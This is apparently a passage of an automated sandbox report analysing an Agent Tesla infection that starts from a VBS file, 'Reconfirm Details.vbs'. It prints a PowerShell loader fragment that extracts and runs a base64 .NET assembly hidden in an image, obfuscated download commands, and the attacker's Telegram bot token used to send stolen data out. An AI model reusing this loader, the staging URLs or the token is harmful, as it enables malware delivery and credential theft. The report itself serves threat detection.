$startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.noh/ba/moc.ocsnoshm//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }", CommandL
                      Timestamp:04/24/24-06:48:30.121310
                      SID:2851779
                      Source Port:49710
                      Destination Port:443
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-06:48:26.753916
                      SID:2020423
                      Source Port:443
                      Destination Port:49707
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
                      Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
                      Source: 7.2.MSBuild.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/sendMessage?chat_id=595808702"}
                      Source: MSBuild.exe.5684.7.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/sendMessage"}
                      Source: uploaddeimagens.com.brVirustotal: Detection: 6%Perma Link
                      Source: mhsonsco.comVirustotal: Detection: 11%Perma Link
                      Source: https://uploaddeimagens.com.brVirustotal: Detection: 6%Perma Link
                      Source: https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029Virustotal: Detection: 5%Perma Link
                      Source: https://mhsonsco.com/ab/hon.txtVirustotal: Detection: 17%Perma Link
                      Source: Reconfirm Details.vbsVirustotal: Detection: 13%Perma Link
                      Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49713 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.5:49704 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.5:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 103.83.81.68:443 -> 192.168.2.5:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49710 version: TLS 1.2

                      Software Vulnerabilities

                      barindex
                      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                      Networking

                      barindex
                      Source: TrafficSnort IDS: 2020423 ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 1 M1 103.83.81.68:443 -> 192.168.2.5:49707
                      Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49710 -> 149.154.167.220:443
                      Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.21.84.67 443Jump to behavior
                      Source: unknownDNS query: name: paste.ee
                      Source: unknownDNS query: name: api.telegram.org
                      Source: global trafficHTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.br
                      Source: global trafficHTTP traffic detected: GET /ab/hon.txt HTTP/1.1Host: mhsonsco.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc642a8c196134Host: api.telegram.orgContent-Length: 917Expect: 100-continueConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewIP Address: 103.83.81.68 103.83.81.68
                      Source: Joe Sandbox ViewIP Address: 104.21.84.67 104.21.84.67
                      Source: Joe Sandbox ViewIP Address: 104.21.84.67 104.21.84.67
                      Source: Joe Sandbox ViewIP Address: 172.67.215.45 172.67.215.45
                      Source: Joe Sandbox ViewASN Name: ZINIOSS-AS-INZiniosInformationTechnologyPvtLtdIN ZINIOSS-AS-INZiniosInformationTechnologyPvtLtdIN
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: global trafficHTTP traffic detected: GET /d/IKfbD HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49713 version: TLS 1.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /d/IKfbD HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.br
                      Source: global trafficHTTP traffic detected: GET /ab/hon.txt HTTP/1.1Host: mhsonsco.comConnection: Keep-Alive
                      Source: unknownDNS traffic detected: queries for: paste.ee
                      Source: unknownHTTP traffic detected: POST /bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc642a8c196134Host: api.telegram.orgContent-Length: 917Expect: 100-continueConnection: Keep-Alive
                      Source: MSBuild.exe, 00000007.00000002.3315094213.00000000032AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                      Source: powershell.exe, 00000004.00000002.2481321303.000001429006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000004.00000002.2192954953.0000014280223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000002.00000002.2512757575.0000020D279BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2192954953.0000014280001000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.3315094213.0000000003296000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000004.00000002.2192954953.0000014280223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: MSBuild.exe, 00000007.00000002.3305111919.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: powershell.exe, 00000002.00000002.2512757575.0000020D27971000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                      Source: powershell.exe, 00000002.00000002.2512757575.0000020D2798A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2192954953.0000014280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: wscript.exe, 00000000.00000003.2044763280.000002B9568A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2046656305.000002B957010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                      Source: wscript.exe, 00000000.00000003.2044763280.000002B9568A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2046656305.000002B957010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                      Source: MSBuild.exe, 00000007.00000002.3315094213.0000000003296000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                      Source: MSBuild.exe, 00000007.00000002.3315094213.0000000003241000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.3305111919.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/
                      Source: MSBuild.exe, 00000007.00000002.3315094213.0000000003292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/sendDocument
                      Source: wscript.exe, 00000000.00000003.2044763280.000002B9568A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2046656305.000002B957010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                      Source: wscript.exe, 00000000.00000003.2044763280.000002B9568A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2046656305.000002B957010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                      Source: powershell.exe, 00000004.00000002.2481321303.000001429006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000004.00000002.2481321303.000001429006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000004.00000002.2481321303.000001429006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: wscript.exe, 00000000.00000003.2044763280.000002B9568A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2046656305.000002B957010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                      Source: wscript.exe, 00000000.00000003.2044763280.000002B9568A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2046656305.000002B957010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                      Source: powershell.exe, 00000004.00000002.2192954953.0000014280223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: wscript.exe, 00000000.00000003.2043378008.000002B956753000.00000004.00000020.00020000.00000000.sdmp, Reconfirm Details.vbsString found in binary or memory: https://lesferch.github.io/DesktopPic
                      Source: wscript.exe, 00000000.00000003.2041706715.000002B957040000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2046656305.000002B957039000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                      Source: powershell.exe, 00000004.00000002.2481321303.000001429006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: wscript.exe, 00000000.00000003.2041706715.000002B957040000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2046656305.000002B957039000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/
                      Source: wscript.exe, 00000000.00000003.2041706715.000002B95709F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2044904882.000002B954A21000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2043824616.000002B954A3E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2046396149.000002B954A43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2044763280.000002B9568A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2043926546.000002B954A21000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2046306780.000002B954A21000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2040806927.000002B956753000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2042136792.000002B956711000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2040879582.000002B95675A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2044451741.000002B95675C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2043903240.000002B954A42000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2041706715.000002B957040000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2043790050.000002B954A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2044257368.000002B954A21000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2043378008.000002B956753000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2044963255.000002B954A21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/IKfbD
                      Source: wscript.exe, 00000000.00000003.2041706715.000002B957040000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/IKfbD)
                      Source: wscript.exe, 00000000.00000003.2041706715.000002B957040000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2046656305.000002B957039000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/IKfbD-
                      Source: wscript.exe, 00000000.00000003.2043824616.000002B954A3E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2046396149.000002B954A43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2043903240.000002B954A42000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2043790050.000002B954A30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/IKfbDJ
                      Source: wscript.exe, 00000000.00000003.2041706715.000002B957040000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/IKfbDuser
                      Source: wscript.exe, 00000000.00000003.2041706715.000002B957040000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2046656305.000002B957039000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/IKfbDm
                      Source: wscript.exe, 00000000.00000003.2044763280.000002B9568A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2046656305.000002B957010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                      Source: wscript.exe, 00000000.00000003.2044763280.000002B9568A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2046656305.000002B957010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                      Source: powershell.exe, 00000004.00000002.2192954953.0000014280223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br
                      Source: powershell.exe, 00000002.00000002.2573305651.0000020D3FBC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/773/797/original/P
                      Source: powershell.exe, 00000004.00000002.2192954953.0000014280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2192954953.0000014280223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029
                      Source: wscript.exe, 00000000.00000003.2044763280.000002B9568A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2046656305.000002B957010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: wscript.exe, 00000000.00000003.2044763280.000002B9568A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2046656305.000002B957010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                      Source: wscript.exe, 00000000.00000003.2044763280.000002B9568A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2046656305.000002B957010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                      Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.5:49704 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.5:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 103.83.81.68:443 -> 192.168.2.5:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49710 version: TLS 1.2

                      System Summary

                      barindex
                      Source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: Process Memory Space: powershell.exe PID: 360, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: powershell.exe PID: 1472, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8778
                      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8778Jump to behavior
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreD